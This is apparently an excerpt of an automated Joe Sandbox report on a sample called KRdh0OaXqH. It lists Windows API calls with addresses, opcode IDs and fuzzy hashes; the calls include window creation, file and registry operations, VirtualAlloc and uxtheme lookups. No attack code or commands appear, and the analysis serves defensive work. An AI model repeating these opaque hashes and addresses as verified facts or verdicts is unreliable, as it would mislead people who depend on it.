                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoScroll
                                                                                            • String ID:
                                                                                            • API String ID: 629608716-0
                                                                                            • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                            • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                            • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                            • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
APIs
  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
  • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
  • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
• String ID:
• API String ID: 1039859321-0
• Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
• Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
• Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
• Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
APIs
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
• Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
• Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
• Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
• Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
• Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
• Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
• Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
• Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
• Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
• Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
• Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
• Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
• Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
• Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
APIs
• CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
• Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
• Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
• Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
• Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                            APIs
                                                                                            • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            APIs
                                                                                              • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                            • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                              • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3202724764-0
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                            • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                            • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                            • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                            • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                            • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                            • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                            • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                            • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                            • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                            • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                            • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                                            • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                            • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                            • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                            • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                            • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                            • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                              • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
